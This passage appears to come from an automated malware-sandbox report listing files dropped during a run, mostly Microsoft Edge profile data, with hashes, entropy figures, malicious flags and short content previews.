                                                                                                                                                                                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):49545
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.083484597371678
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:EMkbJrT8IeQc5dKwQni1zNt0Wiy3Ny9FgWizFmPa84H8Du3CiokJDSgzMMd6qD4J:EMk1rT8H1K5W93GiCiFoktSmd6qE7V
                                                                                                                                                                                                                                                                                              MD5:A9D42B89E8B4363D91703E4CD23BBB56
                                                                                                                                                                                                                                                                                              SHA1:F99CD1B39186ED32934A1537E2D42B2E000BD6BA
                                                                                                                                                                                                                                                                                              SHA-256:88E23AEEB4B9BFC6F924E63FA82EED66512FC46FB2C11C248C014C2F33285F2F
                                                                                                                                                                                                                                                                                              SHA-512:E82E642DD44928ADB9F3D19819E0677D82ECFEABAEBE75E2296CE2A1A583D2484330C980EA671A00285AC9F9EB44AEA066F16FA9198ACF2C4D823784B37ECFC0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377248544846014","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"1799c692-afe4-4c0d-a87f-678fef28dcf6"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                              MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                              SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                              SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                              SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                              MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                              SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                              SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                              SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.105637406271287
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHL:o1cUh4Y3LbO/BVsJDbYuDRBOyc
                                                                                                                                                                                                                                                                                              MD5:CFE6AA5BB3888F03C04999ADA5DF1C0A
                                                                                                                                                                                                                                                                                              SHA1:2F1E4316C1611F3B1E2117090E5E9D177EE6ABF5
                                                                                                                                                                                                                                                                                              SHA-256:CB2A3986B16815762A2ABF3D5FAD6B35D13BDC6DC2FAE081F1DD1D94DA1E479A
                                                                                                                                                                                                                                                                                              SHA-512:FF824C1A2BA5788461B7762726C869767BC70B163ABBBBA0AA7430999DA31223E487802955627C4F6EB8ACCA15A5B98F35E80B59D9E5AF85E6308DA1A7B323EF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9767
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.111866745329898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stykdwJsF+paFvrE9kbMpH8DbV+FyHQArpUc+PdYJ:stypsFKCDBbG+Q3cl
                                                                                                                                                                                                                                                                                              MD5:8B5540DD2E56E5AD20A9F7BBA2654A67
                                                                                                                                                                                                                                                                                              SHA1:0EBED21CD567C43546865B3ECF5EEA7FC9A8833F
                                                                                                                                                                                                                                                                                              SHA-256:EC15383E1FF48ED3051D4256292136310E8A79A246E7D936B98CC2E44A8DEBEE
                                                                                                                                                                                                                                                                                              SHA-512:4A3A89A4BF64368EF6594EA15DDCC005DCED13B1CB829562C5846512E3509C5A653D4493C8F436E56E9CB70C733906DCF30EEF004623E029CC2B22AD04284AB1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377248544811538","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":853,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10528
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.131885082890991
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stykvw5svQcJ+paFvrE9kbMpH8DbV+FmHHQArpUc/bdKJ:stypsvQcJKCDBbGmnQ3cY
                                                                                                                                                                                                                                                                                              MD5:A351BFAB0737B9B8FDAEB6034D5DB63F
                                                                                                                                                                                                                                                                                              SHA1:22A51A7EE0E5A02B79AE0155DC467AF729CA8859
                                                                                                                                                                                                                                                                                              SHA-256:BDF8A0C98144DD4455AFACDC1F26C001A617656A4B6BC887A2E0407AFEEA66B1
                                                                                                                                                                                                                                                                                              SHA-512:F2FABB8DA423147ED170179FE179337B5756CA37232B4B0F05D9A3E72B5849BB0A2AA0E4B00471BECA006111901B85164F5393F79EB5C67A2192A3D34330EF2E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377248544811538","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13377248555451701","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":885,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":79,"continuous_migration":{"ci_correction_for_holdout_tre
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):28383
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.557713996332678
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:1R+UXCWcD7pLGLPF4W5wRhff4sf8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPlRIkZov:1cuC/1cPF4WaRhff9fu1jakv2FahQtaM
                                                                                                                                                                                                                                                                                              MD5:40B196747985934085B7F42907810141
                                                                                                                                                                                                                                                                                              SHA1:C68A68D7D2DAEF1A1C531F225E5EF100C64CDB95
                                                                                                                                                                                                                                                                                              SHA-256:3973FA66F5E870C79BDEA79BB6861BD874387ECBAB86D7119D680851E88475BA
                                                                                                                                                                                                                                                                                              SHA-512:22C2DAB4D085B31B16592AA826216310DB0D537C963AAA9BAB30DD46808E3B1EDB86CB771FB146E7EF684B9F675D94373055FDA7161C1986D655EAE2B93D3AEA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377248544032094","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377248544032094","location":5,"ma
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):24853
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.565554180248527
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:1R+UXCWZ4W5wRhff4sf8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPlRIkZosrwXeIp4p:1cuCW4WaRhff9fu1jakv2Furtf
                                                                                                                                                                                                                                                                                              MD5:E75FBE00A11F47ACAAA26041BA3D82E8
                                                                                                                                                                                                                                                                                              SHA1:BE10ADDE1A9639C324265EB0DD8BDBCF11118E76
                                                                                                                                                                                                                                                                                              SHA-256:A87620245CE8C1C2F23B2B970609191B693561F996C12564D3455EED08318E00
                                                                                                                                                                                                                                                                                              SHA-512:9486B57162A0E40F6E74EAE319D45FF8B545D0710C96555B92D01F04135113464D4529D019A91615F0761A864D0830FF1553F1E7FFD084A44806B9E8EABFF69C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377248544032094","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377248544032094","location":5,"ma
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):313
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.239320849225696
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:Huh7s1N723oH+Tcwtp3hBtB2KLlVutbk9+q2PN723oH+Tcwtp3hBWsIFUv:87MaYebp3dFL4m+vVaYebp3eFUv
                                                                                                                                                                                                                                                                                              MD5:30573D785A58035A0B0098F840DD7FDB
                                                                                                                                                                                                                                                                                              SHA1:4E42BFEB61348B802EA92220357142F66A1D0113
                                                                                                                                                                                                                                                                                              SHA-256:D271C2B4F129576B1156B7BD588EE4E5EA70AB544341790D364D3759F56D82A6
                                                                                                                                                                                                                                                                                              SHA-512:9692460026F59D55BB67A04C698B082788B13146D4838BE08F5645ECE40B2CC730013FF6A2920565F29790EA05B35A8782E45B60B1E867A57DD77BCF9E1E083E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:29.950 15bc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/28-01:22:29.996 15bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):480979
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.39487604284427
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:IbS15tRdAYDI1JcYxI57aDZ7aJOGiMleOebNG/dFd2X13Wm:IbcXAYDI1JcY+5WZ0OG1yJG/dKWm
                                                                                                                                                                                                                                                                                              MD5:50E6A10B63322716B0F41FAA5ADE7763
                                                                                                                                                                                                                                                                                              SHA1:A692E98436261D50BB746969386B0F67E5D1CD4C
                                                                                                                                                                                                                                                                                              SHA-256:63B057D021BAD249CB19DC9EA17868035C50210D8F099C46221E0E3AB2B8C182
                                                                                                                                                                                                                                                                                              SHA-512:D52875EA29E7F75650AC1E2D0ECB32EB2ADD6A407AF34527E8240945D15775B37EA0DA937E8EBC2F9648BABA031246C1397BFC38C8F937748E2D27FBCCA3F317
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):340
